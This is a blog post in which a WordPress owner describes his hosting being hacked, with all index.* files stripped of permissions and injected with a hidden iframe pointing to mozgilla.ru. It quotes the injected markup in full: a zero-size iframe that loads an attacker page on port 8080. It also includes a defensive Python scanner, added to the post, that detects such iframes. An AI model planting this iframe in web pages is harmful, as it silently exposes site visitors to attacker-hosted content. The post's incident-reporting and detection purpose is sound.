George’s blog » mozgilla

mozgilla hack – index.* files corrupted

This just recently happened to me (last night actually), I think my host got hacked. I have no idea why or how.

OK, so straight to the point. This morning my blog – a WordPress installation – was dead. I was getting either an “access denied” or “you don’t have permission to access…”. First I thought that the blog got screwed somehow and I tried to go into the admin panel (e.g. georgezamfir.com/wp-admin/)… aaand I got the same error code. Crap. At this point I was clueless, I searched online for any Netfirms issues, I thought they messed up something, nothing.

All right, back to basics, I FTP-ed to my host to take a look at the files and this is when I realized that all my index.* (index.php, index.html, index.htm, etc.) files were screwed. There were no permissions set and they all contained some code linking to mozgilla.ru – that code was not familiar to me. Duh, I don’t use iframes. There isn’t much online on this thing except for this page: badwarebusters.org/main/itemview/11308.

I was having the exact same code in my files:
<iframe frameborder="0" onload="if (!this.src){ this.src='http://mozgilla.ru:8080/index.php'; this.height='0'; this.width='0';}" >klsgawbozfesywooikgbcetdnwaubys</iframe>
However, in the .php files the code above was at the very end of the files but in the .html files the code was right after the <body> tag.
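
For cleanup, a web root can be swept for this pattern. The Python scanner below is an added example, not code from the original post: it flags index.* files containing an iframe whose onload handler sets this.src and sizes the frame to zero, and reports whether the tag sits right after <body> or at the end of the file. The sample tag uses a placeholder host, and reading the post's "no permissions set" as mode 000 is an assumption.

```python
import os
import re
import stat

# Constructed sample of the injected tag; the host is a placeholder.
SAMPLE_TAG = ('<iframe frameborder="0" onload="if (!this.src){ '
              "this.src='http://example.invalid:8080/index.php'; "
              "this.height='0'; this.width='0';}\" >x</iframe>")

# Heuristics: an <iframe> whose onload sets this.src and sizes itself to zero.
TAG_RE = re.compile(r"<iframe\b[^>]*>", re.I)
CLOSE_RE = re.compile(r"</iframe\s*>", re.I)
SRC_SET_RE = re.compile(r"\bonload\s*=.*?this\.src\s*=", re.I | re.S)
ZERO_RE = re.compile(r"\b(?:height|width)\s*=\s*[\"']?0\b", re.I)
BODY_END_RE = re.compile(r"<body\b[^>]*>\s*\Z", re.I)

def scan_text(text):
    """Return [(offset, placement)] for each suspicious iframe in text."""
    hits = []
    for m in TAG_RE.finditer(text):
        tag = m.group(0)
        if not (SRC_SET_RE.search(tag) and ZERO_RE.search(tag)):
            continue
        close = CLOSE_RE.search(text, m.end())
        tail = text[close.end():] if close else text[m.end():]
        if BODY_END_RE.search(text[:m.start()]):
            placement = "after <body>"   # where the post saw it in .html files
        elif not tail.strip():
            placement = "end of file"    # where the post saw it in .php files
        else:
            placement = "elsewhere"
        hits.append((m.start(), placement))
    return hits

def scan_tree(root):
    """Scan every index.* file under root; return {path: findings}."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().startswith("index.")):
            path = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.stat(path).st_mode)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
            except PermissionError:
                hits = None              # unreadable: inspect by hand
            if hits or hits is None or mode == 0:  # mode 000 is an assumption
                report[path] = {"mode": oct(mode), "hits": hits}
    return report
```

Files reported with `hits` set to `None` could not be read at all and need to be checked by hand after their permissions are restored.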
